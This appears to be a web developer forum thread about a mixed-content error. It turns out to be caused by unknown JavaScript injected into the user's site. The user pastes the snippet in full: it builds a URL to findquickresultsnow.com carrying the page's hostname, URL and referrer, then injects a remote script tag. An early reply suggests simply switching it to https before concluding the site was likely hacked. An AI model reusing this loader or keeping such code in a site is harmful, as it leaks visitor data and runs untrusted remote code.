Level 122
What is this url http://cdn.jsinit.directfwd.com/sk-jspark_init.php and why can't you change it to https://
Sep 26, 2021
8
Level 1
Mixed Content error
i have deployed my project on Domain am getting this error => Mixed Content: The page at 'https://mywebsite was loaded over HTTPS, but requested an insecure script 'http://cdn.jsinit.directfwd.com/sk-jspark_init.php'. This request has been blocked; the content must be served over HTTPS. home:1 Failed to load resource: the server responded with a status of 500 ()
i have tired to too many way to solve it but not work like i used secure-asset() on my assets but not work, so how to find the issue
Level 1
@Snapey its not in my files its like Random url created by server or something like that
Level 122
@Rabeedmenam you need to get your head around that
I assume you have this line in your code somewhere
Level 1
@snapey it has this code and not Witten by me
(function() {
if(!window._skz_pid)
return;
try
{
this._hlpr = function(){
return {
url : "//findquickresultsnow.com/sk-jspark.php?",
params : {
"dn":window.location.hostname,
"pid":window._skz_pid,
"kwrf": window.location,
"reqref":document.referrer
}
}
}
this._srptloc = function(){
var data = this._hlpr();
var query = data.url;
for (d in data.params)
query += encodeURIComponent(d) + "=" + encodeURIComponent(data.params[d]) + "&";
return query.slice(0, -1);
}
this._script = function(_src,_id){
try {
var _scrpt = document.createElement("script");
_scrpt.src = _src;
_scrpt.id = _id;
document.getElementsByTagName("head")[0].appendChild(_scrpt);
return;
} catch(e){}
}
var url = this._srptloc();
this._script(url);
} catch(e)
{
_sknz_loc_ = "//findquickresultsnow.com/sk-jspark.php?_jsprkderr_=1&dn="+encodeURIComponent(window.location.hostname)+"&pid="+encodeURIComponent(window._skz_pid)+"&kwrf="+encodeURIComponent(window.location)+"&reqref="+encodeURIComponent(document.referrer);
loc = "<scr"+"ipt "+"src=\"+_sknz_loc_+\"></sc"+"ript>";
document.write(loc);
}
})(); /*18*/
Level 122
Thats some dodgy code there
This is code that you have chosen to include in your website?
OK, so I assume that you are working behind an https proxy like cloudflare. When your application receives the request it is coming as an http request not https. The code you show has url like //findquickresultsnow.com/sk-jspark.php starting with // means using the same scheme as the request so if the request is http:// then get http://findquickresultsnow.com/sk-jspark.php
If this code is not in laravel vendor or in npm package I would change it to https:// where you have //
Level 1
@Snapey yes this code is for use the same scheme as the request the point is i am not able to find it in which folder to change , also i doubled checked all my asset , libraries its https:// not http:
Level 1
@snapey also when i disable errors by the below site working fine except some functions
php_flag display_startup_errors on
php_flag display_errors on
php_flag display_errors On
Level 122
if you don't know what this script is, then I suspect your site has been hacked.
1 like
Please or to participate in this conversation.